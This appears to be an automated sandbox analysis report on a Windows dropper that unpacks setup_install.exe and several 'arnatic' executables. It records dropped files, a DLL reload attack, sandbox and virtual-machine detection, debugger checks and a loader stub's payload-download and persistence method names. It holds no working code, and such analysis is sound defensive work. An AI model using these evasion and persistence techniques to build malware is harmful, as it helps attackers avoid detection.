Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.txt	Jump to dropped file

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.txt	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libwinpthread-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libgcc_s_dw2-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurlpp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe	File created: C:\Users\user\AppData\Local\Temp\CC4F.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_7.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.txt	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libstdc++-6.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_8.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.exe (copy)	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

DLL reload attack detected

Show sources

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe

Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\CC4F.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate

Jump to behavior

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe

Stalling execution: Execution stalls by calling Sleep

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_4.exe, 00000011.00000000.300543273.0000000000D32000.00000002.00020000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe TID: 6560	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe TID: 6560	Thread sleep time: -195000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe TID: 5516	Thread sleep count: 42 > 30	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	API coverage: 3.6 %
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	API coverage: 4.9 %

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CC4F.tmp

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe

Code function: 15_2_0040A5EA _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

15_2_0040A5EA

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurl.dll	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\libcurlpp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File opened: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\	Jump to behavior

Source: arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\550
Source: arnatic_5.exe, 00000013.00000003.421224278.0000000003F3C000.00000004.00000001.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp	Binary or memory string: BLuSUGZKtWlFmFaRBHpfyEVMCitNB\|q'<dhP#oM-+BbzY4*:B"('"
Source: arnatic_3.exe, 0000000F.00000000.325038135.0000000000DA5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWumblr.comLf
Source: arnatic_4.exe, 00000011.00000000.300543273.0000000000D32000.00000002.00020000.sdmp	Binary or memory string: vmware
Source: arnatic_3.exe, 0000000F.00000000.320581053.0000000000D63000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000000.325038135.0000000000DA5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_4.exe, 00000011.00000000.300543273.0000000000D32000.00000002.00020000.sdmp	Binary or memory string: DetectVirtualMachine
Source: arnatic_5.exe, 00000013.00000003.417744019.0000000006529000.00000004.00000001.sdmp	Binary or memory string: VMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: arnatic_5.exe, 00000013.00000003.410152253.0000000006529000.00000004.00000001.sdmp	Binary or memory string: e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287859684.0000000002407000.00000004.00000001.sdmp, arnatic_4.exe, 00000011.00000000.300543273.0000000000D32000.00000002.00020000.sdmp	Binary or memory string: <Module>Bear Vpn.exeProgramStubRunnerRunTimeAntiAntismscorlibSystemObjectdelaydelayTimeantiVMantiSandboxantiDebugantiEmulatorenablePersistenceenableFakeErrorMainDownloadPayloadRunOnStartup.ctorExecuteDetectVirtualMachineGetModuleHandleDetectSandboxieCheckRemoteDebuggerPresentDetectDebuggerCheckEmulatorurlregNameAppPathHidepathlpModuleNamehProcessisDebuggerPresentSystem.ReflectionAssemblyTitleAttributeAssemblyDescriptionAttributeAssemblyCompanyAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeAssemblyVersionAttributeSystem.Runtime.InteropServicesComVisibleAttributeGuidAttributeSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeBear VpnEnvironmentExitSystem.ThreadingThreadSleepSystem.IOPathGetTempPathCombineFileWriteAllBytesSystem.NetServicePointManagerSecurityProtocolTypeset_SecurityProtocolWebRequestCreateHttpWebRequestset_MethodWebResponseGetResponseHttpWebResponseStreamGetResponseStreamMemoryStreamCopyToCloseDisposeToArrayIDisposableAppDomainget_CurrentDomainget_FriendlyNameStringConcatExistsAssemblyGetEntryAssemblyget_Locationop_InequalityCopyFileAttributesGetAttributesSetAttributesMicrosoft.Win32RegistryRegistryKeyLocalMachineOpenSubKeySetValueCurrentUserException.cctorSystem.DiagnosticsProcessProcessStartInfoget_StartInfoset_FileNameStartSystem.ManagementManagementObjectSearcherManagementObjectCollectionGetManagementObjectEnumeratorGetEnumeratorManagementBaseObjectget_Currentget_ItemToStringToLowerop_EqualityToUpperInvariantContainsMoveNextDllImportAttributekernel32.dllIntPtrToInt32GetCurrentProcessget_HandleDateTimeget_Nowget_Ticks

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Code function: 1_2_00405FE9 GetSystemInfo,

1_2_00405FE9

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00404B47 FindFirstFileW,	1_2_00404B47
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0040A24D __EH_prolog3,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CopyFileA,FindNextFileA,FindClose,	15_2_0040A24D
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_004625DE __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	15_2_004625DE
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00412D8E _sprintf,FindFirstFileA,_sprintf,FindNextFileA,FindClose,	15_2_00412D8E
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00404F13 __EH_prolog3,_memset,_memset,_memset,_memset,lstrcpyW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileW,FindClose,_memset,_memset,_memset,_memset,_memset,_memset,_memset,_memset,FindClose,	15_2_00404F13
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00412F8E __EH_prolog3,__wgetenv,_sprintf,FindFirstFileA,_sprintf,_sprintf,_sprintf,PathMatchSpecA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,	15_2_00412F8E

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe

Code function: 11_2_00401E70 LoadLibraryA,LoadLibraryA,GetEnvironmentVariableW,GetEnvironmentVariableW,GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetConsoleWindow,

11_2_00401E70

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00401000 mov eax, dword ptr fs:[00000030h]		15_2_00401000
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E69389 mov eax, dword ptr fs:[00000030h]		19_2_00E69389

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe

Code function: 15_2_0046E567 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

15_2_0046E567

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe

Code function: 15_2_0047CD87 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

15_2_0047CD87

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0040115C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,_cexit,_amsg_exit,_initterm,GetStartupInfoA,_initterm,exit,	7_2_0040115C
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00401150 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,_cexit,	7_2_00401150
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0040C18C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	7_2_0040C18C
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0040C190 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,	7_2_0040C190
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,_cexit,_amsg_exit,_initterm,	7_2_004013C9
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Code function: 11_2_0040419A SetUnhandledExceptionFilter,	11_2_0040419A
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Code function: 11_2_004041AC SetUnhandledExceptionFilter,	11_2_004041AC
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0046E567 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0046E567
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00467018 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_00467018
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E6CD9E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00E6CD9E
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E39758 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_00E39758

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_2.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_3.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_5.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_7.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c arnatic_8.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe arnatic_1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe" -a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe arnatic_3.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe arnatic_5.exe	Jump to behavior
